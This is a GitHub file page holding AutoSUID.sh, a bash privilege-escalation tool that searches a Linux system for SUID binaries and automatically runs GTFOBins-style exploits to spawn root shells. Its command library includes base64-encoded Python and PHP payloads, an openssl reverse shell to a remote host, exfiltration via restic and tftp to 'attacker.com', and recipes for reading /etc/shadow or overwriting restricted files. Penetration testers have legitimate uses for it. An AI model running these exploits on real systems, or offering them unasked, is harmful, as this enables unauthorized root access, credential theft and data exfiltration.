-
-
Notifications
You must be signed in to change notification settings - Fork 77
/
AutoSUID.sh
354 lines (332 loc) · 22.2 KB
/
AutoSUID.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
#!/bin/bash
############################################################################
# AutoSUID application is the Open-Source project, the main idea of which #
# is to automate harvesting the SUID executable files and to find a way #
# for further escalating the privileges. #
############################################################################
# Author: Ivan Glinkin #
# Contact: mail@ivanglinkin.com #
# Twitter: https://twitter.com/glinkinivan #
# LinkedIn: https://www.linkedin.com/in/ivanglinkin/ #
############################################################################
# Main SUID source: https://gtfobins.github.io/ #
# GTFOBins creators: - Emilio Pinna (https://twitter.com/norbemi) #
# - Andrea Cardaci (https://twitter.com/cyrus_and) #
############################################################################
# Variables
version="1.173"
releasedate="November 30, 2021"
updatedate="May 21, 2022"
suidlist=(ab agetty ar arj arp as ascii-xfr aspell ash atobm awk base32 base64 basenc bash bridge busybox bzip2 capsh cat chmod chown chroot cmp column comm cp cpio cpulimit csh csplit csvtool cupsfilter curl cut dash date dd dialog diff dig dmsetup docker dosbox ed efax emacs env eqn expand expect file find fish flock fmt fold gawk gcore gdb fgenie genisoimage gimp grep gtester gzip hd head hexdump highlight hping3 iconv install ionice ip jjs join jq jrunscript ksh ksshell ld.so less logsave look lua make mawk more msgattrib msgcat msgconv msgfilter msgmerge msguniq mv nasm nawk nice nl nm nmap node nohup od openssl openvpn paste perf perl pg php pidstat pr ptx python readelf restic rev rlwrap rsync run-parts rview rvim sash sed setarch shuf soelim sort sqlite3 ss ssh-keygen ssh-keyscan sshpass start-stop-daemon stdbuf strace strings sysctl systemctl tac tail taskset tbl tclsh tee tftp tic time timeout troff ul unexpand uniq unshare update-alternatives uudecode uuencode view vigr vim vimdiff vipw watch wc wget whiptail xargs xmodmap xmore xxd xz zsh zsoelim);
restrictedfile="/etc/shadow"
suidlistcount=${#suidlist[@]}; # Count the output
rootsuidlist=(agetty bash zsh ash capsh chroot cpulimit csh dash env expect find fish flock genie ionice ksh ld.so logsave nice node nohup php pidstat python sash setarch sshpass start-stop-daemon stdbuf strace taskset xargs tclsh time timeout unshare run-parts rview rvim view vim vimdiff );
### SUID library
declare -A suidlibrary=( [bash]="Privilege escalation: ./bash -p"
[bash_cmd]="-p"
[zsh]="Privilege escalation: ./zsh"
[zsh_cmd]=""
[agetty]="Privilege escalation: ./agetty -o -p -l /bin/sh -a root tty"
[agetty_cmd]="-o -p -l /bin/sh -a root tty"
[ash]="Privilege escalation: ./ash"
[ash_cmd]=""
[busybox]="Privilege escalation: ./busybox sh"
[busybox_cmd]="sh"
[capsh]="Privilege escalation: ./capsh --gid=0 --uid=0 --"
[capsh_cmd]=" --gid=0 --uid=0 --"
[chroot]="Privilege escalation: ./chroot / /bin/sh -p"
[chroot_cmd]="/ /bin/sh -p"
[cpulimit]="Privilege escalation: ./cpulimit -l 100 -f -- /bin/sh -p"
[cpulimit_cmd]="-l 100 -f -- /bin/sh -p"
[csh]="Privilege escalation: ./csh -b"
[csh_cmd]="-b"
[dash]="Privilege escalation: ./dash -p"
[dash_cmd]="-p"
[env]="Privilege escalation: ./env /bin/sh -p"
[env_cmd]="/bin/sh -p"
[expect]="Privilege escalation: ./expect -c 'spawn /bin/sh -p;interact'"
[expect_cmd]="-c 'spawn /bin/sh -p;interact'"
[find]="Privilege escalation: ./find . -exec /bin/sh -p \; -quit"
[find_cmd]=". -exec /bin/sh -p \; -quit"
[fish]="Privilege escalation: ./fish"
[fish_cmd]=""
[flock]="Privilege escalation: ./flock -u / /bin/sh -p"
[flock_cmd]="-u / /bin/sh -p"
[genie]="Privilege escalation: genie -c '/bin/sh'"
[genie_cmd]="-c '/bin/sh'"
[ionice]="Privilege escalation: ./ionice /bin/sh -p"
[ionice_cmd]="/bin/sh -p"
[ksh]="Privilege escalation: ./ksh -p"
[ksh_cmd]="-p"
[ld.so]="Privilege escalation: ./ld.so /bin/sh -p"
[ld.so_cmd]="/bin/sh -p"
[logsave]="Privilege escalation: ./logsave /dev/null /bin/sh -i -p"
[logsave_cmd]="/dev/null /bin/sh -i -p"
[nice]="Privilege escalation: ./nice /bin/sh -p"
[nice_cmd]="/bin/sh -p"
[node]="Privilege escalation: ./node -e 'child_process.spawn(\"/bin/sh\", [\"-p\"], {stdio: [0, 1, 2]})'"
[node_cmd]="-e 'child_process.spawn(\"/bin/sh\", [\"-p\"], {stdio: [0, 1, 2]})'"
[nohup]="Privilege escalation: ./nohup /bin/sh -p -c \"sh -p <$(tty) >$(tty) 2>$(tty)\""
[nohup_cmd]='/bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"'
[php]="Privilege escalation: ./php -r \"pcntl_exec('/bin/sh', ['-p']);\""
[php_cmd]="-f $(echo PD9waHAKcGNudGxfZXhlYygnL2Jpbi9zaCcsIFsnLXAnXSk7Cj8+ | base64 -d > pwn_php.me; echo pwn_php.me)"
[pidstat]="Privilege escalation: ./pidstat -c COMMAND. In this particular case, we create another SUID file - /bin/bash. To get the root, execute 'bash -p'"
[pidstat_cmd]="-e chmod +s /bin/bash"
[python]="Privilege escalation: ./python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"
[python_cmd]="$(echo aW1wb3J0IG9zOyBvcy5leGVjbCgiL2Jpbi9zaCIsICJzaCIsICItcCIp | base64 -d > pwn_python.me; echo pwn_python.me)"
[sash]="Privilege escalation: ./sash"
[sash_cmd]=""
[setarch]="Privilege escalation: ./setarch $(arch) /bin/sh -p"
[setarch_cmd]="$(arch) /bin/sh -p"
[sshpass]="Privilege escalation: ./sshpass /bin/sh -p"
[sshpass_cmd]="/bin/sh -p"
[start-stop-daemon]="Privilege escalation: ./start-stop-daemon -n \$RANDOM -S -x /bin/sh -- -p"
[start-stop-daemon_cmd]="-n $RANDOM -S -x /bin/sh -- -p"
[stdbuf]="Privilege escalation: ./stdbuf -i0 /bin/sh -p"
[stdbuf_cmd]="-i0 /bin/sh -p"
[strace]="Privilege escalation: ./strace -o /dev/null /bin/sh -p"
[strace_cmd]="-o /dev/null /bin/sh -p"
[taskset]="Privilege escalation: ./taskset 1 /bin/sh -p"
[taskset_cmd]="1 /bin/sh -p"
[xargs]="Privilege escalation: ./xargs -a /dev/null sh -p"
[xargs_cmd]="-a /dev/null sh -p"
[tclsh]="Privilege escalation: ./tclsh; exec /bin/sh -p <@stdin >@stdout 2>@stderr"
[tclsh_cmd]="$(echo 'exec /bin/sh -p <@stdin >@stdout 2>@stderr' > pwn_tclsh.me; echo pwn_tclsh.me)"
[time]="Privilege escalation: ./time /bin/sh -p"
[time_cmd]="/bin/sh -p"
[timeout]="Privilege escalation: ./timeout 7d /bin/sh -p"
[timeout_cmd]="7d /bin/bash -p"
[unshare]="Privilege escalation: ./unshare -r /bin/sh"
[unshare_cmd]="-r /bin/sh"
[run-parts]="Privilege escalation: ./run-parts --new-session --regex '^sh$' /bin --arg='-p'"
[run-parts_cmd]="--new-session --regex '^sh$' /bin --arg='-p'"
[rview]="Privilege escalation: ./rview -c ':py3 import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
[rview_cmd]="-c ':py3 import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset;exec sh -p\")'"
[rvim]="Privilege escalation: ./rvim -c ':py3 import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
[rvim_cmd]="-c ':py3 import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset;exec sh -p\")'"
[view]="Privilege escalation: ./view -c ':py3 import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
[view_cmd]="-c ':py3 import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset;exec sh -p\")'"
[vim]="Privilege escalation: ./vim -c ':py3 import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
[vim_cmd]="-c ':py3 import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset;exec sh -p\")'"
[vimdiff]="Privilege escalation: ./vimdiff -c ':py3 import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
[vimdiff_cmd]="-c ':py3 import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset;exec sh -p\")'"
[ab]="Upload local file via HTTP POST request: ./ab -p FILE_TO_SEND URL"
[chmod]="Change permissions: ./chmod 6777 FILE_TO_CHANGE"
[chown]="Change permissions: ./chown \$(id -un):\$(id -gn) FILE_TO_CHANGE"
[dmsetup]="Privilege escalation: ./dmsetup create base <<EOF; 0 3534848 linear /dev/loop0 94208; EOF; ./dmsetup ls --exec '/bin/sh -p -s'"
[docker]="Privilege escalation: ./docker run -v /:/mnt --rm -it alpine chroot /mnt sh"
[emacs]="Privilege escalation: ./emacs -Q -nw --eval '(term \"/bin/sh -p\")'"
[gcore]="Privilege escalation: ./gcore \$PID"
[gdb]="Bash restiction bypass: ./gdb -nx -ex 'python import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")' -ex quit"
[gimp]="Privilege escalation: ./gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"
[gtester]="Bash restiction bypass: TF=\$(mktemp);
echo '#!/bin/sh -p' > \$TF;
echo 'exec /bin/sh -p 0<&1' >> \$TF
chmod +x \$TF
sudo gtester -q \$TF"
[hping3]="Privilege escalation: ./hping3; /bin/sh -p"
[install]="Change permissions: ./install -m 6777 FILE_TO_CHANGE \$(mktemp)"
[ip]="\n\tBash restiction bypass: ./ip netns add foo; ./ip netns exec foo /bin/sh -p;./ip netns delete foo\n\tRead the restricted file: ./ip -force -batch FILE_NAME"
[jjs]="Bash restiction bypass: echo \"Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()\" | ./jjs"
[jrunscript]="Bash restiction bypass: ./jrunscript -e \"exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <\$(tty) >$(tty) 2>$(tty)')\""
[make]="Bash restiction bypass: ./make -s --eval=$'x:\n\t-'\"/bin/sh -p\""
[msgfilter]="Bash restiction bypass: echo x | ./msgfilter -P /bin/sh -p -c '/bin/sh -p 0<&2 1>&2; kill \$PPID'"
[rlwrap]="./rlwrap -H /dev/null /bin/sh -p"
[rsync]="Break out from restricted environments: ./rsync -e 'sh -p -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null"
[openssl]="\n\tGet reverse shell: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -connect REMOTE_HOST:REMOTE_PORT > /tmp/s; rm /tmp/s\n\tWrite into file: echo DATA | /.openssl enc -out FILE_NAME"
[perf]="Bash restiction bypass: ./perf stat /bin/sh -p"
[perl]="Bash restiction bypass: ./perl -e 'exec \"/bin/sh\";'"
[restic]="Exfiltrate files on the network: RHOST=attacker.com; RPORT=12345; LFILE=file_or_dir_to_get; NAME=backup_name; restic backup -r \"rest:http://\$RHOST:$\RPORT/\$NAME\" \"\$LFILE\""
[wget]="Fetch a remote file via HTTP GET request: ./wget URL -O FILE_NAME"
[watch]="Bash restiction bypass: ./watch -x sh -c 'reset; exec sh 1>&0 2>&0'"
[tftp]="Send local file to a TFTP server: RHOST=attacker.com; ./tftp \$RHOST; put file_to_send"
[systemctl]="Privilege escalation: TF=\$(mktemp).service; echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c \"id > /tmp/output\"
[Install]
WantedBy=multi-user.target' > \$TF;
./systemctl link \$TF;
./systemctl enable --now \$TF"
[cp]="Write into the restricted file: echo DATA | ./cp /dev/stdin FILE_TO_WRITE"
[arj]="Write into the restricted file: TF=\$(mktemp -d); LFILE=file_to_write; LDIR=where_to_write; echo DATA >\"\$TF/\$LFILE\"; ./arj a \"\$TF/a\" \"\$TF/\$LFILE\"; ./arj e \"\$TF/a\" \$LDIR"
[cpio]="\n\tRead the restricted file: echo FILE_NAME | ./cpio -R \$UID -dp \$(mktemp -d); cat \"\$(mktemp -d)/FILE_NAME\"\n\tWrite into the restricted file: echo DATA > FILE_TO_WRITE; echo FILE_TO_WRITE | ./cpio -R 0:0 -p DIR_WHERE_TO_WRITE"
[curl]="Write into the restricted file: ./curl URL -o FILE_TO_WRITE"
[dd]="Write into the restricted file: echo DATA | ./dd of=FILE_TO_WRITE"
[mvdosbox]="Write into the restricted file: ./dosbox -c 'mount c /' -c \"echo DATA >c:FILE_TO_WRITE\" -c exit"
[mv]="Write into the restricted file: LFILE=file_to_write; TF=\$(mktemp); echo \"DATA\" > \$TF; ./mv \$TF \$LFILE"
[nmap]="Write into the restricted file: ./nmap -oG=FILE_NAME DATA"
[shuf]="Write into the restricted file: ./shuf -e DATA -o FILE_NAME"
[tee]="Write into the restricted file: echo DATA | ./tee -a FILE_NAME"
[ssh-keygen]="It loads shared libraries that may be used to run code in the binary execution context: ./ssh-keygen -D ./lib.so"
[update-alternatives]="Write in file: LFILE=/path/to/file_to_write; TF=\$(mktemp); echo DATA >\$TF; ./update-alternatives --force --install \"\$LFILE\" x \"\$TF\" 0"
[vipw]="Write into the restricted file: ./vipw"
[cat]="Read the restricted file: ./cat FILE_NAME"
[ascii-xfr]="Read the restricted file: ./ascii-xfr -ns FILE_NAME"
[aspell]="Read the restricted file: ./aspell -c FILE_NAME"
[ar]="Read the restricted file: ./ar r \$(mktemp -u) FILE_NAME; cat \$(mktemp -u)"
[arp]="Read the restricted file: ./arp -v -f FILE_NAME"
[as]="Read the restricted file: ./as FILE_NAME"
[atobm]="Read the restricted file: ./atobm FILE_NAME 2>&1 | awk -F \"'\" '{printf \"%s\", \$2}'"
[awk]="Read the restricted file: ./awk '//' FILE_NAME"
[base32]="Read the restricted file: ./base32 FILE_NAME | base32 --decode"
[base64]="Read the restricted file: ./base64 FILE_NAME | base64 --decode"
[basenc]="Read the restricted file: basenc --base64 FILE_NAME | basenc -d --base64 FILE_NAME"
[bridge]="Read the restricted file: ./bridge -b FILE_NAME"
[bzip2]="Read the restricted file: ./bzip2 -c FILE_NAME | bzip2 -d"
[cmp]="Read the restricted file: ./cmp FILE_NAME /dev/zero -b -l"
[column]="Read the restricted file: ./column FILE_NAME"
[comm]="Read the restricted file: comm FILE_NAME /dev/null 2>/dev/null"
[csplit]="Read the restricted file: ./csplit FILE_NAME 1; cat xx01"
[csvtool]="Read the restricted file: ./csvtool trim t FILE_NAME"
[cupsfilter]="Read the restricted file: ./cupsfilter -i application/octet-stream -m application/octet-stream FILE_NAME"
[cut]="Read the restricted file: ./cut -d "" -f1 FILE_NAME"
[date]="Read the restricted file: ./date -f FILE_NAME"
[dialog]="Read the restricted file: ./dialog --textbox FILE_NAME 0 0"
[diff]="Read the restricted file: ./diff --line-format=%L /dev/null FILE_NAME"
[dig]="Read the restricted file: ./dig -f FILE_NAME"
[ed]="Read the restricted file: ./ed FILE_NAME; ,p; q"
[efax]="Read the restricted file: ./efax -d FILE_NAME"
[eqn]="Read the restricted file: ./eqn FILE_NAME"
[file]="Read the restricted file: ./file -f FILE_NAME"
[fmt]="Read the restricted file: ./fmt -999 FILE_NAME"
[fold]="Read the restricted file: ./fold -w99999999 FILE_NAME"
[gawk]="Read the restricted file: ./gawk '//' FILE_NAME"
[genisoimage]="Read the restricted file: ./genisoimage -sort FILE_NAME"
[grep]="Read the restricted file: ./grep '' FILE_NAME"
[gzip]="Read the restricted file: ./gzip -f FILE_NAME -t"
[hd]="Read the restricted file: ./hd FILE_NAME"
[head]="Read the restricted file: ./head -c1G FILE_NAME"
[hexdump]="Read the restricted file: ./hexdump -C FILE_NAME"
[highlight]="Read the restricted file: ./highlight --no-doc --failsafe FILE_NAME"
[iconv]="Read the restricted file: ./iconv -f 8859_1 -t 8859_1 FILE_NAME"
[join]="Read the restricted file: ./join -a 2 /dev/null FILE_NAME"
[jq]="Read the restricted file: ./jq -Rr . FILE_NAME"
[ksshell]="Read the restricted file: ./ksshell -i FILE_NAME"
[less]="Read the restricted file: ./less FILE_NAME"
[look]="Read the restricted file: ./look '' FILE_NAME"
[lua]="Read the restricted file: lua -e 'local f=io.open(\"FILE_NAME\", \"rb\"); print(f:read(\"*a\")); io.close(f);'"
[mawk]="Read the restricted file: ./mawk '//' FILE_NAME"
[more]="Read the restricted file: ./more FILE_NAME"
[msgattrib]="Read the restricted file: ./msgattrib -P FILE_NAME"
[msgcat]="Read the restricted file: ./msgcat -P FILE_NAME"
[msgconv]="Read the restricted file: ./msgconv -P FILE_NAME"
[msgmerge]="Read the restricted file: ./msgmerge -P FILE_NAME /dev/null"
[msguniq]="Read the restricted file: ./msguniq -P FILE_NAME"
[nasm]="Read the restricted file: ./nasm -@ FILE_NAME"
[nawk]="Read the restricted file: ./nawk '//' FILE_NAME"
[nl]="Read the restricted file: ./nl -bn -w1 -s '' FILE_NAME"
[nm]="Read the restricted file: ./nm @FILE_NAME"
[od]="Read the restricted file: ./od -An -c -w9999 FILE_NAME"
[openvpn]="Read the restricted file: ./openvpn --config FILE_NAME"
[paste]="Read the restricted file: ./paste FILE_NAME"
[pg]="Read the restricted file: ./pg FILE_NAME"
[pr]="Read the restricted file: ./pr -T FILE_NAME"
[ptx]="Read the restricted file: ./ptx -w 5000 FILE_NAME"
[readelf]="Read the restricted file: ./readelf -a @FILE_NAME"
[rev]="Read the restricted file: ./rev FILE_NAME | rev"
[sed]="Read the restricted file: ./sed -e '' FILE_NAME"
[soelim]="Read the restricted file: ./soelim FILE_NAME"
[sort]="Read the restricted file: ./sort -m FILE_NAME"
[ss]="Read the restricted file: ./ss -a -F FILE_NAME"
[sqlite3]="Read the restricted file: LFILE=file_to_read; sqlite3 << EOF; CREATE TABLE t(line TEXT);
.import \$LFILE t; SELECT * FROM t; EOF"
[ssh-keyscan]="Read the restricted file: ./ssh-keyscan -f FILE_NAME"
[strings]="Read the restricted file: ./strings FILE_NAME"
[sysctl]="Read the restricted file: ./sysctl -n \"/../../FILE_NAME\""
[tac]="Read the restricted file: ./tac -s 'RANDOM' FILE_NAME"
[tail]="Read the restricted file: ./tail -c1G FILE_NAME"
[tbl]="Read the restricted file: ./tbl FILE_NAME"
[tic]="Read the restricted file: ./tic -C FILE_NAME"
[troff]="Read the restricted file: ./troff FILE_NAME"
[ul]="Read the restricted file: ./ul FILE_NAME"
[unexpand]="Read the restricted file: ./unexpand -t99999999 FILE_NAME"
[uniq]="Read the restricted file: ./uniq FILE_NAME"
[uudecode]="Read the restricted file: uuencode FILE_NAME /dev/stdout | uudecode"
[uuencode]="Read the restricted file: uuencode FILE_NAME /dev/stdout | uudecode"
[vigr]="Read and change the restricted file: ./vigr"
[wc]="Read the restricted file: ./wc --files0-from FILE_NAME"
[whiptail]="Read the restricted file: ./whiptail --textbox --scrolltext FILE_NAME 0 0"
[xmodmap]="Read the restricted file: ./xmodmap -v FILE_NAME"
[xmore]="Read the restricted file: ./xmore FILE_NAME"
[xxd]="Read the restricted file: ./xxd FILE_NAME | xxd -r"
[xz]="Read the restricted file: ./xz -c FILE_NAME | xz -d"
[zsoelim]="Read the restricted file: ./zsoelim FILE_NAME"
)
### SUID library
# Colors
RED=`echo -n '\e[00;31m'`;
RED_BOLD=`echo -n '\e[01;31m'`;
GREEN=`echo -n '\e[00;32m'`;
GREEN_BOLD=`echo -n '\e[01;32m'`;
ORANGE=`echo -n '\e[00;33m'`;
BLUE=`echo -n '\e[01;36m'`;
WHITE=`echo -n '\e[00;37m'`;
CLEAR_FONT=`echo -n '\e[00m'`;
## Header
echo -e "";
echo -e "$ORANGE╔═══════════════════════════════════════════════════════════════════════════╗$CLEAR_FONT";
echo -e "$ORANGE║\t\t\t\t\t\t\t\t\t ║$CLEAR_FONT";
echo -e "$ORANGE║$CLEAR_FONT$GREEN_BOLD\t\t\t\t AutoSUID\t\t\t\t $CLEAR_FONT$ORANGE║$CLEAR_FONT";
echo -e "$ORANGE║\t\t\t\t\t\t\t\t\t ║\e[00m";
echo -e "$ORANGE╚═══════════════════════════════════════════════════════════════════════════╝$CLEAR_FONT";
echo -e "";
echo -e "$ORANGE[ ! ] https://www.linkedin.com/in/IvanGlinkin/ | @glinkinivan$CLEAR_FONT";
echo -e "";
## Find the SUID files
echo -e "$ORANGE[ ! ]$CLEAR_FONT Running the command to find SUID files";
echo -e "$BLUE[ * * ]$CLEAR_FONT$GREEN_BOLD find / -xdev -user root \( -perm -4000 -o -perm -2000 -o -perm -6000 \) 2>/dev/null$CLEAR_FONT";
suidArray=$(find / -xdev -user root \( -perm -4000 -o -perm -2000 -o -perm -6000 \) 2>/dev/null); # Harvesting SUID files
## Check if there are no related files
if [ -z "$suidArray" ]
then
echo -e "$RED_BOLD[ - ]$CLEAR_FONT The command has successfuly performed, but we did not find any related files";
exit
fi
countsuidArray=$(echo $suidArray | tr " " "\n" | wc -l); # Count the output
echo -e "$GREEN_BOLD[ + ]$CLEAR_FONT The command has successfuly performed. We have found $GREEN_BOLD$countsuidArray$CLEAR_FONT file(s)";
echo -e "$ORANGE[ ! ]$CLEAR_FONT Let's compare the found SUID files with predefined base ($GREEN_BOLD$suidlistcount$CLEAR_FONT apps)";
## Check if the found SUID files leads to escalation
for suidSelect in ${suidlist[@]};
do exploitablesuidarray+=($(echo $suidArray | tr " " "\n" | grep -i "/$suidSelect$" | awk '{print $1 " "}'));
done;
#### No results
if [ -z "$exploitablesuidarray" ]
then
echo -e "$RED_BOLD[ - ]$CLEAR_FONT Unfortunately, there are no any SUID files, which lead to privilege escalation";
## Clean residual pwn* files
rm pwn*
exit
fi
exploitablesuidarraycount=${#exploitablesuidarray[@]}; # Count the output
echo -e "$GREEN_BOLD[ + ]$CLEAR_FONT We have found at least $GREEN_BOLD$exploitablesuidarraycount$CLEAR_FONT potential SUID exploitable file(s):"
for suidexploitable in "${exploitablesuidarray[@]}"
do
suidcommand=$(echo $suidexploitable | awk -F "/" '{print $NF}'); # clear the path
suidexplanation=$(echo ${suidlibrary[$suidcommand]});
echo -e "\n$BLUE[ * * ]$CLEAR_FONT $suidexploitable";
echo -e "$BLUE[ Explanation ]$CLEAR_FONT $GREEN_BOLD$suidexplanation$CLEAR_FONT";
done
## The further attack explanation
echo -e "\n$GREEN_BOLD[ + ]$CLEAR_FONT Exploitation..."
for suidexploitable in "${exploitablesuidarray[@]}"
do
suidcommand=$(echo $suidexploitable | awk -F "/" '{print $NF}'); # clear the path
## check for matches
for suidSelect in ${rootsuidlist[@]};
do
if [ $suidcommand == $suidSelect ]
then
wehavesuidtoroot=true;
echo -e "$BLUE[ * * ]$CLEAR_FONT We have found$RED_BOLD $suidSelect SUID$CLEAR_FONT file. Trying to get root";
keys=$(echo $suidSelect"_cmd");
exploit=$(echo $suidexploitable ${suidlibrary[$keys]});
echo -e "$BLUE[ * * ]$CLEAR_FONT Executing $RED_BOLD$exploit$CLEAR_FONT";
$exploit;
fi;
done
done
## Clean after ourselves
rm pwn*
if [ ! $wehavesuidtoroot ]
then echo -e "$BLUE[ * * ]$CLEAR_FONT Seems like there are no privilege escalation files through SUID in the system. Follow the instructions above to read the restricted files, eg. $RED_BOLD/etc/shadow$CLEAR_FONT or $RED_BOLD/root/.bash_history$CLEAR_FONT, or perform other high privileges commands. P.s. think outside the box to pivot into the root ;)";
fi